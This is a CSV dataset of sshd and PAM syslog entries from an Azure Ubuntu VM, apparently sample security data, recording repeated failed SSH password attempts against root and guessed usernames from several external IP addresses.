+9610,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:46,UbuntuDevEnv,2019-06-25 22:42:45,auth,UbuntuDevEnv,info,Failed password for test from 152.250.252.179 port 34038 ssh2,48603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,34038,,
+9611,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:46,UbuntuDevEnv,2019-06-25 22:42:45,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 152.250.252.179 port 34038 [preauth],48603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,152.250.252.1,34038,,
+9612,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:46,UbuntuDevEnv,2019-06-25 22:42:45,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 34038:11: Bye Bye [preauth],48603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,34038,,
+9613,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:48,UbuntuDevEnv,2019-06-25 22:42:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,48611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9614,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:49,UbuntuDevEnv,2019-06-25 22:42:49,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 5282 ssh2,48611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,5282,,
+9615,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:55,UbuntuDevEnv,2019-06-25 22:42:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=59.100.246.170  user=sshd,48646,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sshd,59.100.246.1,,0,
+9616,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:55,UbuntuDevEnv,2019-06-25 22:42:53,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 5282 ssh2,48611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,5282,,
+9617,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:56,UbuntuDevEnv,2019-06-25 22:42:56,auth,UbuntuDevEnv,info,Failed password for sshd from 59.100.246.170 port 46281 ssh2,48646,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,59.100.246.1,46281,,
+9618,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:57,UbuntuDevEnv,2019-06-25 22:42:56,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 5282 ssh2,48611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,5282,,
+9619,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:57,UbuntuDevEnv,2019-06-25 22:42:56,auth,UbuntuDevEnv,info,Invalid user peter from 77.232.128.87 port 43291,48656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peter,77.232.128.8,43291,,
+9620,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:57,UbuntuDevEnv,2019-06-25 22:42:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,48656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9621,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:57,UbuntuDevEnv,2019-06-25 22:42:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87,48656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.232.128.8,,0,
+9622,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:57,UbuntuDevEnv,2019-06-25 22:42:56,auth,UbuntuDevEnv,info,Received disconnect from 59.100.246.170 port 46281:11: Bye Bye [preauth],48646,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,59.100.246.1,46281,,
+9623,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:57,UbuntuDevEnv,2019-06-25 22:42:56,auth,UbuntuDevEnv,info,Disconnected from authenticating user sshd 59.100.246.170 port 46281 [preauth],48646,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,sshd,59.100.246.1,46281,,
+9624,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:59,UbuntuDevEnv,2019-06-25 22:42:58,auth,UbuntuDevEnv,info,Failed password for invalid user peter from 77.232.128.87 port 43291 ssh2,48656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peter,77.232.128.8,43291,,
+9625,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:59,UbuntuDevEnv,2019-06-25 22:42:58,auth,UbuntuDevEnv,info,Disconnected from invalid user peter 77.232.128.87 port 43291 [preauth],48656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peter,77.232.128.8,43291,,
+9626,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:59,UbuntuDevEnv,2019-06-25 22:42:58,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 43291:11: Bye Bye [preauth],48656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,43291,,
+9627,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:42:59,UbuntuDevEnv,2019-06-25 22:42:58,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 5282 ssh2,48611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,5282,,
+9628,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:01,UbuntuDevEnv,2019-06-25 22:43:01,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 5282 ssh2,48611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,5282,,
+9629,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:04,UbuntuDevEnv,2019-06-25 22:43:03,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 5282 ssh2,48611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,5282,,
+9630,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:04,UbuntuDevEnv,2019-06-25 22:43:03,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 5282: Too many authentication failures [preauth],48611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,5282,,
+9631,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:04,UbuntuDevEnv,2019-06-25 22:43:03,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 5282 ssh2 [preauth],48611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,5282,,
+9632,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:04,UbuntuDevEnv,2019-06-25 22:43:03,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,48611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9633,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:04,UbuntuDevEnv,2019-06-25 22:43:03,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,48611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9634,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:09,UbuntuDevEnv,2019-06-25 22:43:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,48694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9635,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:11,UbuntuDevEnv,2019-06-25 22:43:11,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 19536 ssh2,48694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,19536,,
+9636,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:14,UbuntuDevEnv,2019-06-25 22:43:13,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 19536 ssh2,48694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,19536,,
+9637,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:25,UbuntuDevEnv,2019-06-25 22:43:25,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,48694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9638,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:25,UbuntuDevEnv,2019-06-25 22:43:25,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 19536: Too many authentication failures [preauth],48694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,19536,,
+9639,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:25,UbuntuDevEnv,2019-06-25 22:43:25,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,48694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9640,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:25,UbuntuDevEnv,2019-06-25 22:43:25,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 19536 ssh2 [preauth],48694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,19536,,
+9641,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:25,UbuntuDevEnv,2019-06-25 22:43:25,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 218.92.0.175 port 19536 ssh2],48694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,19536,,
+9642,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:30,UbuntuDevEnv,2019-06-25 22:43:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,48767,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9643,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:32,UbuntuDevEnv,2019-06-25 22:43:31,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 31601 ssh2,48767,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,31601,,
+9644,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:45,UbuntuDevEnv,2019-06-25 22:43:45,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 31601 ssh2 [preauth],48767,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,31601,,
+9645,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:45,UbuntuDevEnv,2019-06-25 22:43:45,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 31601: Too many authentication failures [preauth],48767,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,31601,,
+9646,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:45,UbuntuDevEnv,2019-06-25 22:43:45,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 218.92.0.175 port 31601 ssh2],48767,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,31601,,
+9647,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:45,UbuntuDevEnv,2019-06-25 22:43:45,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,48767,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9648,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:45,UbuntuDevEnv,2019-06-25 22:43:45,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,48767,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9649,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:48,UbuntuDevEnv,2019-06-25 22:43:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,48843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9650,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:48,UbuntuDevEnv,2019-06-25 22:43:48,auth,UbuntuDevEnv,info,Invalid user amine from 178.62.54.79 port 43042,48852,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amine,178.62.54.7,43042,,
+9651,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:48,UbuntuDevEnv,2019-06-25 22:43:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,48852,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9652,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:48,UbuntuDevEnv,2019-06-25 22:43:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79,48852,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.62.54.7,,0,
+9653,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:50,UbuntuDevEnv,2019-06-25 22:43:49,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 43559 ssh2,48843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,43559,,
+9654,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:50,UbuntuDevEnv,2019-06-25 22:43:49,auth,UbuntuDevEnv,info,Failed password for invalid user amine from 178.62.54.79 port 43042 ssh2,48852,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amine,178.62.54.7,43042,,
+9655,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:50,UbuntuDevEnv,2019-06-25 22:43:50,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 43042:11: Bye Bye [preauth],48852,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,43042,,
+9656,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:50,UbuntuDevEnv,2019-06-25 22:43:50,auth,UbuntuDevEnv,info,Disconnected from invalid user amine 178.62.54.79 port 43042 [preauth],48852,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amine,178.62.54.7,43042,,
+9657,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:43:53,UbuntuDevEnv,2019-06-25 22:43:52,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 43559 ssh2,48843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,43559,,
+9658,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:01,UbuntuDevEnv,2019-06-25 22:44:00,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 218.92.0.175 port 43559 ssh2],48843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,43559,,
+9659,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:01,UbuntuDevEnv,2019-06-25 22:44:01,auth,UbuntuDevEnv,info,Invalid user waski from 139.199.113.140 port 55276,48889,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,waski,139.199.113.1,55276,,
+9660,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:01,UbuntuDevEnv,2019-06-25 22:44:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,48889,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9661,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:01,UbuntuDevEnv,2019-06-25 22:44:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.113.140,48889,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.113.1,,0,
+9662,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:03,UbuntuDevEnv,2019-06-25 22:44:03,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 43559: Too many authentication failures [preauth],48843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,43559,,
+9663,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:03,UbuntuDevEnv,2019-06-25 22:44:03,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 43559 ssh2,48843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,43559,,
+9664,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:03,UbuntuDevEnv,2019-06-25 22:44:03,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,48843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9665,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:03,UbuntuDevEnv,2019-06-25 22:44:03,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,48843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9666,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:03,UbuntuDevEnv,2019-06-25 22:44:03,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 43559 ssh2 [preauth],48843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,43559,,
+9667,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:04,UbuntuDevEnv,2019-06-25 22:44:03,auth,UbuntuDevEnv,info,Failed password for invalid user waski from 139.199.113.140 port 55276 ssh2,48889,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,waski,139.199.113.1,55276,,
+9668,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:04,UbuntuDevEnv,2019-06-25 22:44:04,auth,UbuntuDevEnv,info,Received disconnect from 139.199.113.140 port 55276:11: Bye Bye [preauth],48889,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.113.1,55276,,
